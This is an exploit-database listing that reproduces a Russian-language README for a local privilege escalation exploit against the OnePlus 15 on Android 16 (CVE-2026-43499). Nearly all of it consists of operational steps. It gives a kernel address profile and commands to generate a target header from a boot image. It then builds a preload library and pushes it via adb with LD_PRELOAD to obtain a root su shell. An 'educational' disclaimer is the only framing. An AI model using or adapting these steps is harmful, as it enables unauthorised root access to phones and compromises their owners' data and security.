Sploitus

Exploit for CVE-2026-43499-OnePlus15

kitploit · 2026-08-31

Exploit Code

MARKDOWN75 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BARTIXXX32-CVE-2026-43499-ONEPLUS15
# CVE-2026-43499 — OnePlus 15 LPE (Образовательный PoC)

> **ПРЕДУПРЕЖДЕНИЕ:** Этот репозиторий предоставлен **только в образовательных и исследовательских целях**. Никаких предварительно собранных бинарных файлов или релизов не распространяется. Вы должны собрать всё из исходного кода.

Локальное повышение привилегий в Android 16 для OnePlus 15.

Форк x-spy/CVE-2026-43499-popsicle с исправлением выравнивания kallsyms и подтверждённым профилем OnePlus 15.

## Профиль

Профиль содержит два физических адреса, которые необходимо подтвердить на рутированном устройстве с той же прошивкой:

root@kitploit:~
    
    
    {
      "p0_phys_offset": "0x80000000",
      "p0_kernel_phys_load": "0xc7800000"
    }
    

Автоопределение с рутированным устройством:

root@kitploit:~
    
    
    python3 detect_offset.py
    

## Генерация цели

Требуется Python 3 и `llvm-objdump`:

root@kitploit:~
    
    
    python3 generate_target.py \
      --boot boot.img \
      --profile profile_oneplus15.json \
      -o source/src/target.h
    

## Сборка

root@kitploit:~
    
    
    make -C source clean preload
    

Если NDK не обнаружен автоматически:

root@kitploit:~
    
    
    NDK_ROOT=/path/to/android-ndk make -C source clean preload
    

Результат: `source/build/bin/preload.so`

## Запуск

root@kitploit:~
    
    
    adb push source/build/bin/preload.so /data/local/tmp/preload.so
    adb shell chmod 0644 /data/local/tmp/preload.so
    adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
    adb shell /data/local/tmp/su -c id
    

## Благодарности

  * x-spy за оригинальный эксплойт и обнаружение CVE